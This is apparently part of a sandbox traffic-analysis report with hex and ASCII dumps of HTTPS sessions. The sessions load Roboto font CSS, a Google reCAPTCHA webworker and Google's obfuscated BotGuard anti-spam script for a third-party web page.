2024-08-28 11:31:50 UTC	1390	IN	Data Raw: 34 45 73 41 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 33 37 30 2d 30 33 37 37 2c 20 55 2b 30 33 37 41 2d 30 33 37 46 2c 20 55 2b 30 33 38 34 2d 30 33 38 41 2c 20 55 2b 30 33 38 43 2c 20 55 2b 30 33 38 45 2d 30 33 41 31 2c 20 55 2b 30 33 41 33 2d 30 33 46 46 3b 0a 7d 0a 2f 2a 20 76 69 65 74 6e 61 6d 65 73 65 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f Data Ascii: 4EsA.woff2) format('woff2'); unicode-range: U+0370-0377, U+037A-037F, U+0384-038A, U+038C, U+038E-03A1, U+03A3-03FF;}/* vietnamese */@font-face { font-family: 'Roboto'; font-style: normal; font-weight: 500; src: url(//fonts.gstatic.com/s/robo
2024-08-28 11:31:50 UTC	1390	IN	Data Raw: 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 34 36 30 2d 30 35 32 46 2c 20 55 2b 31 43 38 30 2d 31 43 38 38 2c 20 55 2b 32 30 42 34 2c 20 55 2b 32 44 45 30 2d 32 44 46 46 2c 20 55 2b 41 36 34 30 2d 41 36 39 46 2c 20 55 2b 46 45 32 45 2d 46 45 32 46 3b 0a 7d 0a 2f 2a 20 63 79 72 69 6c 6c 69 63 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6c 43 6e Data Ascii: format('woff2'); unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face { font-family: 'Roboto'; font-style: normal; font-weight: 900; src: url(//fonts.gstatic.com/s/roboto/v18/KFOlCn
2024-08-28 11:31:50 UTC	1390	IN	Data Raw: 6e 71 45 75 39 32 46 72 31 4d 6d 59 55 74 66 43 68 63 34 45 73 41 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 31 30 30 2d 30 32 41 46 2c 20 55 2b 30 33 30 34 2c 20 55 2b 30 33 30 38 2c 20 55 2b 30 33 32 39 2c 20 55 2b 31 45 30 30 2d 31 45 39 46 2c 20 55 2b 31 45 46 32 2d 31 45 46 46 2c 20 55 2b 32 30 32 30 2c 20 55 2b 32 30 41 30 2d 32 30 41 42 2c 20 55 2b 32 30 41 44 2d 32 30 43 30 2c 20 55 2b 32 31 31 33 2c 20 55 2b 32 43 36 30 2d 32 43 37 46 2c 20 55 2b 41 37 32 30 2d 41 37 46 46 3b 0a 7d 0a 2f 2a 20 6c 61 74 69 6e 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 Data Ascii: nqEu92Fr1MmYUtfChc4EsA.woff2) format('woff2'); unicode-range: U+0100-02AF, U+0304, U+0308, U+0329, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face { font-family: 'Roboto'; font-s
2024-08-28 11:31:50 UTC	1390	IN	Data Raw: 64 73 36 5f 33 54 49 62 62 6b 74 66 68 49 4d 61 65 34 64 54 6f 53 35 31 74 4b 63 7a 4c 50 6f 66 4e 78 54 37 53 70 67 61 75 7a 49 44 70 38 70 77 4c 52 5a 73 4d 5f 57 44 61 48 65 68 44 69 4e 47 36 63 32 4b 6e 67 57 45 57 73 37 49 45 62 74 53 79 63 36 55 64 4b 62 4f 5a 5a 5f 51 73 37 49 32 51 6c 53 32 42 31 47 4a 71 5a 64 6b 4e 78 77 6b 35 33 47 51 38 5a 51 4d 4e 6b 47 74 51 2d 52 51 46 4a 41 31 66 37 6c 66 65 4a 35 4b 47 4e 61 79 67 49 43 43 72 4f 66 37 56 35 54 54 6f 51 69 79 49 54 55 31 51 58 49 77 43 64 50 34 6c 58 33 6f 35 38 53 57 4d 47 48 56 57 4f 45 68 6b 61 73 30 74 73 68 4b 54 53 64 4e 35 50 2d 48 58 44 5a 57 51 67 55 73 38 37 56 62 70 44 41 54 65 56 2d 64 4e 72 33 55 67 32 79 63 33 50 77 31 31 75 42 6a 66 61 69 4a 68 5a 41 7a 79 77 4c 49 65 33 6b Data Ascii: ds6_3TIbbktfhIMae4dToS51tKczLPofNxT7SpgauzIDp8pwLRZsM_WDaHehDiNG6c2KngWEWs7IEbtSyc6UdKbOZZ_Qs7I2QlS2B1GJqZdkNxwk53GQ8ZQMNkGtQ-RQFJA1f7lfeJ5KGNaygICCrOf7V5TToQiyITU1QXIwCdP4lX3o58SWMGHVWOEhkas0tshKTSdN5P-HXDZWQgUs87VbpDATeV-dNr3Ug2yc3Pw11uBjfaiJhZAzywLIe3k
2024-08-28 11:31:50 UTC	1390	IN	Data Raw: 45 51 51 4f 5a 79 76 44 35 63 66 56 64 38 4f 35 49 76 65 49 78 56 5a 74 72 34 38 78 63 2d 72 4f 70 33 39 5f 78 64 4e 6b 4c 59 77 31 58 50 66 69 51 43 34 65 2d 74 52 59 33 79 4c 66 56 6a 42 73 37 70 74 33 45 59 53 4b 7a 42 71 44 6c 48 4b 6c 4c 64 31 6d 71 54 34 75 2d 70 56 58 30 64 75 44 58 61 30 66 36 59 54 50 6c 4f 66 56 61 70 7a 51 37 55 4e 48 56 65 57 52 38 4f 43 4a 62 2d 38 6a 63 6e 4d 46 57 71 43 4b 2d 4a 36 2d 44 4a 45 36 63 65 30 5a 48 7a 41 61 50 51 69 48 6d 75 67 38 31 71 37 2d 4a 58 73 4e 4c 46 6b 59 70 6d 57 74 31 57 73 61 69 33 46 5a 71 47 44 4e 74 76 31 4b 78 64 42 4f 38 6c 78 6d 39 57 47 6b 50 65 42 6e 38 59 4e 5f 30 71 4b 77 38 52 6a 64 5f 5f 61 77 42 4e 44 69 4b 56 59 7a 39 59 4b 4e 30 6a 53 53 36 65 7a 2d 5f 36 6d 6e 74 4d 64 68 4d 78 30 Data Ascii: EQQOZyvD5cfVd8O5IveIxVZtr48xc-rOp39_xdNkLYw1XPfiQC4e-tRY3yLfVjBs7pt3EYSKzBqDlHKlLd1mqT4u-pVX0duDXa0f6YTPlOfVapzQ7UNHVeWR8OCJb-8jcnMFWqCK-J6-DJE6ce0ZHzAaPQiHmug81q7-JXsNLFkYpmWt1Wsai3FZqGDNtv1KxdBO8lxm9WGkPeBn8YN_0qKw8Rjd__awBNDiKVYz9YKN0jSS6ez-_6mntMdhMx0
2024-08-28 11:31:50 UTC	1390	IN	Data Raw: 33 70 75 64 6d 70 75 61 7a 49 31 63 6c 42 47 59 6c 4e 72 64 48 70 49 64 6c 6c 79 55 6b 5a 57 51 31 42 79 5a 6b 34 72 53 6e 68 57 54 55 35 68 52 31 4e 55 56 56 67 32 61 46 64 52 4e 6d 73 72 56 6d 5a 52 4e 45 63 76 64 47 31 6f 4d 33 52 6f 53 30 6f 30 53 32 5a 49 62 6c 67 78 52 46 64 70 64 6e 56 76 64 7a 56 48 54 6c 41 78 53 31 42 47 56 48 4a 49 53 6a 42 30 63 6d 4d 7a 51 56 56 4f 64 44 64 71 4e 58 68 76 56 47 35 5a 63 6b 30 77 64 6b 39 4b 56 6b 4a 47 62 54 4e 50 62 32 5a 59 62 46 6c 53 4d 31 55 79 62 44 59 31 64 47 31 59 57 54 52 53 61 6d 64 69 65 48 64 6b 51 57 30 79 57 57 4e 5a 64 54 6c 4d 54 53 73 32 4e 31 52 34 65 47 45 72 52 32 46 4c 54 57 64 69 56 7a 4a 6c 51 30 35 50 4f 45 74 68 55 33 70 47 52 46 6c 50 4e 47 64 6c 54 31 4d 78 62 6c 52 44 57 6a 4e 33 Data Ascii: 3pudmpuazI1clBGYlNrdHpIdllyUkZWQ1ByZk4rSnhWTU5hR1NUVVg2aFdRNmsrVmZRNEcvdG1oM3RoS0o0S2ZIblgxRFdpdnVvdzVHTlAxS1BGVHJISjB0cmMzQVVOdDdqNXhvVG5Zck0wdk9KVkJGbTNPb2ZYbFlSM1UybDY1dG1YWTRSamdieHdkQW0yWWNZdTlMTSs2N1R4eGErR2FLTWdiVzJlQ05POEthU3pGRFlPNGdlT1MxblRDWjN3
2024-08-28 11:31:50 UTC	1390	IN	Data Raw: 61 64 6e 70 7a 61 57 35 78 4d 58 70 49 61 31 68 6f 56 6e 63 30 51 6b 78 7a 57 6b 31 6d 65 6b 64 53 54 55 5a 42 59 58 6c 36 51 32 6c 57 53 6c 63 33 53 31 70 6b 63 45 5a 53 56 44 46 76 4e 6e 46 47 61 6e 55 30 55 57 45 31 52 57 4d 34 4f 56 45 7a 63 6b 70 5a 4d 7a 64 31 56 57 64 6c 55 57 73 78 53 32 6b 78 52 48 70 4f 55 30 5a 4b 57 57 63 72 63 33 56 6b 59 58 46 50 53 45 46 78 53 7a 64 49 5a 6c 56 5a 64 7a 4a 70 53 6b 74 4e 55 6e 70 68 57 44 52 55 4c 7a 4a 36 52 33 6c 4c 53 44 68 4d 55 44 56 6a 55 48 68 77 56 32 39 75 62 56 63 34 52 6e 64 57 4e 44 6b 77 51 54 4a 4e 65 54 68 56 57 57 70 59 55 54 56 42 55 46 68 4d 51 32 51 30 4e 45 35 6c 57 58 52 44 52 47 64 4d 61 54 64 30 56 57 78 4d 63 6e 4a 50 65 45 52 31 4d 54 6c 61 54 46 5a 46 64 6e 42 42 53 44 64 68 4c 30 Data Ascii: adnpzaW5xMXpIa1hoVnc0QkxzWk1mekdSTUZBYXl6Q2lWSlc3S1pkcEZSVDFvNnFGanU0UWE1RWM4OVEzckpZMzd1VWdlUWsxS2kxRHpOU0ZKWWcrc3VkYXFPSEFxSzdIZlVZdzJpSktNUnphWDRULzJ6R3lLSDhMUDVjUHhwV29ubVc4RndWNDkwQTJNeThVWWpYUTVBUFhMQ2Q0NE5lWXRDRGdMaTd0VWxMcnJPeER1MTlaTFZFdnBBSDdhL0

Timestamp	Bytes transferred	Direction	Data
2024-08-28 11:31:53 UTC	856	OUT	GET /recaptcha/api2/webworker.js?hl=en&v=i7X0JrnYWy9Y_5EYdoFM79kV HTTP/1.1 Host: www.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX Sec-Fetch-Site: same-origin Sec-Fetch-Mode: same-origin Sec-Fetch-Dest: worker Referer: https://www.google.com/recaptcha/api2/anchor?ar=1&k=6LduUDAqAAAAAAkMYVpyEZmE78bW2HDvbqPEVRHh&co=aHR0cHM6Ly9odm1uLnJhdW1mdWVybGViZW4uY29tOjQ0Mw..&hl=en&v=i7X0JrnYWy9Y_5EYdoFM79kV&size=normal&cb=7ipr88utdgc0 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-08-28 11:31:53 UTC	655	IN	HTTP/1.1 200 OK Content-Type: text/javascript; charset=utf-8 Cross-Origin-Embedder-Policy: require-corp Report-To: {"group":"recaptcha","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/recaptcha"}]} Expires: Wed, 28 Aug 2024 11:31:53 GMT Date: Wed, 28 Aug 2024 11:31:53 GMT Cache-Control: private, max-age=300 X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN Content-Security-Policy: frame-ancestors 'self' X-XSS-Protection: 1; mode=block Server: GSE Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-08-28 11:31:53 UTC	108	IN	Data Raw: 36 36 0d 0a 69 6d 70 6f 72 74 53 63 72 69 70 74 73 28 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 72 65 6c 65 61 73 65 73 2f 69 37 58 30 4a 72 6e 59 57 79 39 59 5f 35 45 59 64 6f 46 4d 37 39 6b 56 2f 72 65 63 61 70 74 63 68 61 5f 5f 65 6e 2e 6a 73 27 29 3b 0d 0a Data Ascii: 66importScripts('https://www.gstatic.com/recaptcha/releases/i7X0JrnYWy9Y_5EYdoFM79kV/recaptcha__en.js');
2024-08-28 11:31:53 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-08-28 11:31:53 UTC	844	OUT	GET /js/bg/PSKopaksc4v0TeE9MSufUBd6uLsTLN3_1JKIESb4JYg.js HTTP/1.1 Host: www.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://www.google.com/recaptcha/api2/anchor?ar=1&k=6LduUDAqAAAAAAkMYVpyEZmE78bW2HDvbqPEVRHh&co=aHR0cHM6Ly9odm1uLnJhdW1mdWVybGViZW4uY29tOjQ0Mw..&hl=en&v=i7X0JrnYWy9Y_5EYdoFM79kV&size=normal&cb=7ipr88utdgc0 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-08-28 11:31:53 UTC	810	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/botguard-scs Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="botguard-scs" Report-To: {"group":"botguard-scs","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/botguard-scs"}]} Content-Length: 18390 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Wed, 28 Aug 2024 11:06:57 GMT Expires: Thu, 28 Aug 2025 11:06:57 GMT Cache-Control: public, max-age=31536000 Last-Modified: Tue, 13 Aug 2024 10:30:00 GMT Content-Type: text/javascript Vary: Accept-Encoding Age: 1496 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-08-28 11:31:53 UTC	580	IN	Data Raw: 2f 2a 20 41 6e 74 69 2d 73 70 61 6d 2e 20 57 61 6e 74 20 74 6f 20 73 61 79 20 68 65 6c 6c 6f 3f 20 43 6f 6e 74 61 63 74 20 28 62 61 73 65 36 34 29 20 59 6d 39 30 5a 33 56 68 63 6d 51 74 59 32 39 75 64 47 46 6a 64 45 42 6e 62 32 39 6e 62 47 55 75 59 32 39 74 20 2a 2f 20 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6c 3d 66 75 6e 63 74 69 6f 6e 28 55 2c 56 29 7b 69 66 28 28 56 3d 28 55 3d 6e 75 6c 6c 2c 61 29 2e 74 72 75 73 74 65 64 54 79 70 65 73 2c 21 56 29 7c 7c 21 56 2e 63 72 65 61 74 65 50 6f 6c 69 63 79 29 72 65 74 75 72 6e 20 55 3b 74 72 79 7b 55 3d 56 2e 63 72 65 61 74 65 50 6f 6c 69 63 79 28 22 62 67 22 2c 7b 63 72 65 61 74 65 48 54 4d 4c 3a 66 2c 63 72 65 61 74 65 53 63 72 69 70 74 3a 66 2c 63 72 65 61 74 65 53 63 72 69 70 74 55 52 4c 3a 66 7d Data Ascii: /* Anti-spam. Want to say hello? Contact (base64) Ym90Z3VhcmQtY29udGFjdEBnb29nbGUuY29t */ (function(){var l=function(U,V){if((V=(U=null,a).trustedTypes,!V)\|\|!V.createPolicy)return U;try{U=V.createPolicy("bg",{createHTML:f,createScript:f,createScriptURL:f}
2024-08-28 11:31:53 UTC	1390	IN	Data Raw: 68 65 2d 32 2e 30 27 2c 0a 27 2a 2f 27 2c 0a 27 76 61 72 20 56 58 3d 66 75 6e 63 74 69 6f 6e 28 55 2c 76 29 7b 69 66 28 28 76 3d 28 55 3d 6e 75 6c 6c 2c 42 29 2e 74 72 75 73 74 65 64 54 79 70 65 73 2c 21 76 29 7c 7c 21 76 2e 63 72 65 61 74 65 50 6f 6c 69 63 79 29 72 65 74 75 72 6e 20 55 3b 74 72 79 7b 55 3d 76 2e 63 72 65 61 74 65 50 6f 6c 69 63 79 28 22 62 67 22 2c 7b 63 72 65 61 74 65 48 54 4d 4c 3a 55 63 2c 63 72 65 61 74 65 53 63 72 69 70 74 3a 55 63 2c 63 72 65 61 74 65 53 63 72 69 70 74 55 52 4c 3a 55 63 7d 29 7d 63 61 74 63 68 28 56 29 7b 42 2e 63 6f 6e 73 6f 6c 65 26 26 42 2e 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 56 2e 6d 65 73 73 61 67 65 29 7d 72 65 74 75 72 6e 20 55 7d 2c 76 47 3d 66 75 6e 63 74 69 6f 6e 28 55 2c 76 2c 56 29 7b 72 65 74 75 Data Ascii: he-2.0','*/','var VX=function(U,v){if((v=(U=null,B).trustedTypes,!v)\|\|!v.createPolicy)return U;try{U=v.createPolicy("bg",{createHTML:Uc,createScript:Uc,createScriptURL:Uc})}catch(V){B.console&&B.console.error(V.message)}return U},vG=function(U,v,V){retu
2024-08-28 11:31:53 UTC	1390	IN	Data Raw: 3d 28 56 2e 4b 26 26 22 3a 54 51 52 3a 54 51 52 3a 22 28 29 2c 76 29 2c 56 29 2e 4b 3d 74 72 75 65 3b 74 72 79 7b 41 3d 56 2e 41 28 29 2c 56 2e 58 3d 30 2c 56 2e 73 3d 30 2c 56 2e 52 3d 41 2c 56 2e 44 3d 41 2c 6c 3d 59 6b 28 76 2c 56 29 2c 55 3d 55 3f 30 3a 31 30 2c 66 3d 56 2e 41 28 29 2d 56 2e 44 2c 56 2e 69 2b 3d 66 2c 56 2e 5a 41 26 26 56 2e 5a 41 28 66 2d 56 2e 68 2c 56 2e 49 2c 56 2e 4f 2c 56 2e 73 29 2c 56 2e 49 3d 66 61 6c 73 65 2c 56 2e 4f 3d 66 61 6c 73 65 2c 56 2e 68 3d 30 2c 66 3c 55 7c 7c 56 2e 6e 4a 2d 2d 3c 3d 30 7c 7c 28 66 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 66 29 2c 56 2e 56 24 2e 70 75 73 68 28 66 3c 3d 32 35 34 3f 66 3a 32 35 34 29 29 7d 66 69 6e 61 6c 6c 79 7b 56 2e 4b 3d 66 61 6c 73 65 7d 72 65 74 75 72 6e 20 6c 7d 7d 2c 77 78 3d 66 Data Ascii: =(V.K&&":TQR:TQR:"(),v),V).K=true;try{A=V.A(),V.X=0,V.s=0,V.R=A,V.D=A,l=Yk(v,V),U=U?0:10,f=V.A()-V.D,V.i+=f,V.ZA&&V.ZA(f-V.h,V.I,V.O,V.s),V.I=false,V.O=false,V.h=0,f<U\|\|V.nJ--<=0\|\|(f=Math.floor(f),V.V$.push(f<=254?f:254))}finally{V.K=false}return l}},wx=f
2024-08-28 11:31:53 UTC	1390	IN	Data Raw: 69 64 20 30 2c 78 28 34 37 32 2c 55 2c 76 29 29 7d 2c 6d 67 3d 66 75 6e 63 74 69 6f 6e 28 55 2c 76 29 7b 72 65 74 75 72 6e 20 4c 5b 55 5d 28 4c 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 72 65 70 6c 61 63 65 3a 76 2c 6c 65 6e 67 74 68 3a 76 2c 70 61 72 65 6e 74 3a 76 2c 70 72 6f 70 65 72 74 79 49 73 45 6e 75 6d 65 72 61 62 6c 65 3a 76 2c 73 74 61 63 6b 3a 76 2c 70 6f 70 3a 76 2c 63 61 6c 6c 3a 76 2c 73 70 6c 69 63 65 3a 76 2c 63 6f 6e 73 6f 6c 65 3a 76 2c 64 6f 63 75 6d 65 6e 74 3a 76 2c 70 72 6f 74 6f 74 79 70 65 3a 76 2c 66 6c 6f 6f 72 3a 76 7d 29 7d 2c 62 4b 3d 66 75 6e 63 74 69 6f 6e 28 55 2c 76 2c 56 2c 66 2c 6c 2c 41 2c 59 2c 4d 29 7b 72 65 74 75 72 6e 28 28 41 3d 28 56 3d 5b 28 6c 3d 66 26 37 2c 35 31 29 2c 38 2c 28 4d 3d 78 6b 2c 2d 36 36 29 2c 33 39 2c Data Ascii: id 0,x(472,U,v))},mg=function(U,v){return L[U](L.prototype,{replace:v,length:v,parent:v,propertyIsEnumerable:v,stack:v,pop:v,call:v,splice:v,console:v,document:v,prototype:v,floor:v})},bK=function(U,v,V,f,l,A,Y,M){return((A=(V=[(l=f&7,51),8,(M=xk,-66),39,
2024-08-28 11:31:53 UTC	1390	IN	Data Raw: 6e 28 55 2c 76 2c 56 2c 66 2c 6c 29 7b 66 6f 72 28 76 3d 28 66 3d 28 56 3d 28 55 3d 55 2e 72 65 70 6c 61 63 65 28 2f 5c 5c 72 5c 5c 6e 2f 67 2c 22 5c 5c 6e 22 29 2c 30 29 2c 5b 5d 29 2c 30 29 3b 76 3c 55 2e 6c 65 6e 67 74 68 3b 76 2b 2b 29 6c 3d 55 2e 63 68 61 72 43 6f 64 65 41 74 28 76 29 2c 6c 3c 31 32 38 3f 66 5b 56 2b 2b 5d 3d 6c 3a 28 6c 3c 32 30 34 38 3f 66 5b 56 2b 2b 5d 3d 6c 3e 3e 36 7c 31 39 32 3a 28 28 6c 26 36 34 35 31 32 29 3d 3d 35 35 32 39 36 26 26 76 2b 31 3c 55 2e 6c 65 6e 67 74 68 26 26 28 55 2e 63 68 61 72 43 6f 64 65 41 74 28 76 2b 31 29 26 36 34 35 31 32 29 3d 3d 35 36 33 32 30 3f 28 6c 3d 36 35 35 33 36 2b 28 28 6c 26 31 30 32 33 29 3c 3c 31 30 29 2b 28 55 2e 63 68 61 72 43 6f 64 65 41 74 28 2b 2b 76 29 26 31 30 32 33 29 2c 66 5b 56 Data Ascii: n(U,v,V,f,l){for(v=(f=(V=(U=U.replace(/\\r\\n/g,"\\n"),0),[]),0);v<U.length;v++)l=U.charCodeAt(v),l<128?f[V++]=l:(l<2048?f[V++]=l>>6\|192:((l&64512)==55296&&v+1<U.length&&(U.charCodeAt(v+1)&64512)==56320?(l=65536+((l&1023)<<10)+(U.charCodeAt(++v)&1023),f[V
2024-08-28 11:31:53 UTC	1390	IN	Data Raw: 6e 63 74 69 6f 6e 28 61 2c 44 29 7b 44 3d 53 28 6e 28 61 29 2c 61 29 2c 41 68 28 61 2e 6c 2c 44 29 7d 2c 28 78 28 33 37 35 2c 28 78 28 34 31 2c 56 2c 28 72 28 56 2c 28 72 28 56 2c 66 75 6e 63 74 69 6f 6e 28 61 2c 44 2c 68 29 7b 78 28 28 68 3d 6e 28 28 44 3d 6e 28 61 29 2c 61 29 29 2c 68 29 2c 61 2c 22 22 2b 53 28 44 2c 61 29 29 7d 2c 28 72 28 56 2c 28 78 28 39 37 2c 56 2c 28 72 28 28 72 28 56 2c 28 78 28 33 39 38 2c 56 2c 28 78 28 34 34 37 2c 28 72 28 56 2c 28 78 28 31 37 31 2c 28 72 28 56 2c 28 78 28 31 2c 56 2c 28 72 28 56 2c 66 75 6e 63 74 69 6f 6e 28 61 2c 44 2c 68 29 7b 64 28 66 61 6c 73 65 2c 44 2c 74 72 75 65 2c 61 29 7c 7c 28 44 3d 6e 28 61 29 2c 68 3d 6e 28 61 29 2c 78 28 68 2c 61 2c 66 75 6e 63 74 69 6f 6e 28 51 29 7b 72 65 74 75 72 6e 20 65 76 Data Ascii: nction(a,D){D=S(n(a),a),Ah(a.l,D)},(x(375,(x(41,V,(r(V,(r(V,function(a,D,h){x((h=n((D=n(a),a)),h),a,""+S(D,a))},(r(V,(x(97,V,(r((r(V,(x(398,V,(x(447,(r(V,(x(171,(r(V,(x(1,V,(r(V,function(a,D,h){d(false,D,true,a)\|\|(D=n(a),h=n(a),x(h,a,function(Q){return ev
2024-08-28 11:31:53 UTC	1390	IN	Data Raw: 28 44 3d 67 28 28 68 3d 6e 28 61 29 2c 61 29 29 2c 61 29 29 2c 51 29 2c 61 2c 53 28 68 2c 61 29 3e 3e 3e 44 29 7d 29 2c 34 33 32 29 2c 30 29 2c 31 36 29 29 2c 56 29 2c 30 29 2c 66 75 6e 63 74 69 6f 6e 28 61 2c 44 2c 68 2c 51 2c 77 29 7b 28 68 3d 28 77 3d 28 44 3d 28 51 3d 28 77 3d 28 51 3d 28 44 3d 28 68 3d 6e 28 61 29 2c 6e 29 28 61 29 2c 6e 28 61 29 29 2c 6e 28 61 29 29 2c 53 28 51 2c 61 29 29 2c 53 29 28 44 2c 61 29 2c 53 29 28 77 2c 61 29 2c 53 28 68 2c 61 2e 6c 29 29 2c 68 21 3d 3d 30 29 26 26 28 51 3d 74 68 28 31 2c 51 2c 77 2c 61 2c 68 2c 44 29 2c 68 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 44 2c 51 2c 43 29 2c 78 28 36 30 2c 61 2c 5b 68 2c 44 2c 51 5d 29 29 7d 29 2c 32 36 37 29 2c 32 34 36 29 29 2c 5b 32 30 34 38 5d 29 29 2c 66 75 6e Data Ascii: (D=g((h=n(a),a)),a)),Q),a,S(h,a)>>>D)}),432),0),16)),V),0),function(a,D,h,Q,w){(h=(w=(D=(Q=(w=(Q=(D=(h=n(a),n)(a),n(a)),n(a)),S(Q,a)),S)(D,a),S)(w,a),S(h,a.l)),h!==0)&&(Q=th(1,Q,w,a,h,D),h.addEventListener(D,Q,C),x(60,a,[h,D,Q]))}),267),246)),[2048])),fun
2024-08-28 11:31:53 UTC	1390	IN	Data Raw: 61 2c 2b 51 29 7d 29 2c 32 31 31 29 2c 56 29 2c 56 29 2c 66 75 6e 63 74 69 6f 6e 28 61 2c 44 2c 68 2c 51 29 7b 28 44 3d 53 28 28 51 3d 28 68 3d 28 44 3d 28 51 3d 6e 28 61 29 2c 6e 28 61 29 29 2c 6e 29 28 61 29 2c 53 29 28 51 2c 61 29 2c 44 29 2c 61 29 2c 78 29 28 68 2c 61 2c 51 5b 44 5d 29 7d 29 2c 32 38 35 29 2c 56 29 2c 42 29 2c 5b 5d 29 29 2c 66 75 6e 63 74 69 6f 6e 28 61 2c 44 2c 68 2c 51 2c 77 2c 62 2c 6b 29 7b 66 6f 72 28 77 3d 53 28 32 35 37 2c 28 51 3d 28 62 3d 28 68 3d 6e 28 61 29 2c 77 78 28 61 29 29 2c 22 22 29 2c 61 29 29 2c 6b 3d 77 2e 6c 65 6e 67 74 68 2c 44 3d 30 3b 62 2d 2d 3b 29 44 3d 28 28 44 7c 30 29 2b 28 77 78 28 61 29 7c 30 29 29 25 6b 2c 51 2b 3d 59 5b 77 5b 44 5d 5d 3b 78 28 68 2c 61 2c 51 29 7d 29 2c 31 33 38 29 2c 56 29 2c 66 75 Data Ascii: a,+Q)}),211),V),V),function(a,D,h,Q){(D=S((Q=(h=(D=(Q=n(a),n(a)),n)(a),S)(Q,a),D),a),x)(h,a,Q[D])}),285),V),B),[])),function(a,D,h,Q,w,b,k){for(w=S(257,(Q=(b=(h=n(a),wx(a)),""),a)),k=w.length,D=0;b--;)D=((D\|0)+(wx(a)\|0))%k,Q+=Y[w[D]];x(h,a,Q)}),138),V),fu
